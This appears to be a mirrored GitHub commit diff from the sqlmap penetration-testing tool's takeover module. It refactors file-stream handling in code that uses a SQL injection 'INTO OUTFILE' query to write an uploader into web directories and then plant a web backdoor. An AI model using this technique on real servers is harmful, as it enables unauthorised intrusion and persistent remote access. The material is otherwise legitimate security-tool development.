Thanks to visit codestin.com
Credit goes to github.com

Skip to content

Commit f8056f4

Browse files
stamparmstamparm
committed
quick fix regarding usage of StringIO instead of file stream
1 parent a0eabb6 commit f8056f4

1 file changed

Lines changed: 9 additions & 9 deletions

File tree

lib/takeover/web.py

Lines changed: 9 additions & 9 deletions
Original file line numberDiff line numberDiff line change
@@ -24,7 +24,7 @@
2424

2525
import os
2626
import re
27-
import StringIO
27+
from tempfile import TemporaryFile
2828

2929
from lib.core.agent import agent
3030
from lib.core.common import fileToStr
@@ -77,10 +77,10 @@ def webBackdoorRunCmd(self, cmd):
7777

7878
def webFileUpload(self, fileToUpload, destFileName, directory):
7979
file = open(fileToUpload, "r")
80-
webStreamUpload(self, file, destFileName, directory)
80+
webFileStreamUpload(self, file, destFileName, directory)
8181
file.close()
8282

83-
def webStreamUpload(self, stream, destFileName, directory):
83+
def webFileStreamUpload(self, stream, destFileName, directory):
8484
if self.webApi == "php":
8585
multipartParams = {
8686
"upload": "1",
@@ -157,17 +157,17 @@ def webInit(self):
157157
logger.warn("invalid value, it must be 1 or 3")
158158

159159
backdoorName = "backdoor.%s" % self.webApi
160-
backdoorStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_')))
160+
backdoorStream = TemporaryFile()
161+
backdoorStream.write(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, backdoorName + '_')))
162+
backdoorStream.seek(0)
161163

162164
uploaderName = "uploader.%s" % self.webApi
163-
uploaderStream = StringIO.StringIO(decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_')))
164-
165-
uploaderStr = uploaderStream.read()
165+
uploaderContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, uploaderName + '_'))
166166

167167
for directory in directories:
168168
# Upload the uploader agent
169169
outFile = os.path.normpath("%s/%s" % (directory, uploaderName))
170-
uplQuery = uploaderStr.replace("WRITABLE_DIR", directory)
170+
uplQuery = uploaderContent.replace("WRITABLE_DIR", directory)
171171
query = " LIMIT 1 INTO OUTFILE '%s' " % outFile
172172
query += "LINES TERMINATED BY 0x%s --" % hexencode(uplQuery)
173173
query = agent.prefixQuery(" %s" % query)
@@ -192,7 +192,7 @@ def webInit(self):
192192
infoMsg += "on '%s'" % directory
193193
logger.info(infoMsg)
194194

195-
self.webStreamUpload(backdoorStream, backdoorName, directory)
195+
self.webFileStreamUpload(backdoorStream, backdoorName, directory)
196196
self.webBackdoorUrl = "%s/%s" % (self.webBaseUrl, backdoorName)
197197
self.webDirectory = directory
198198

0 commit comments

Comments
 (0)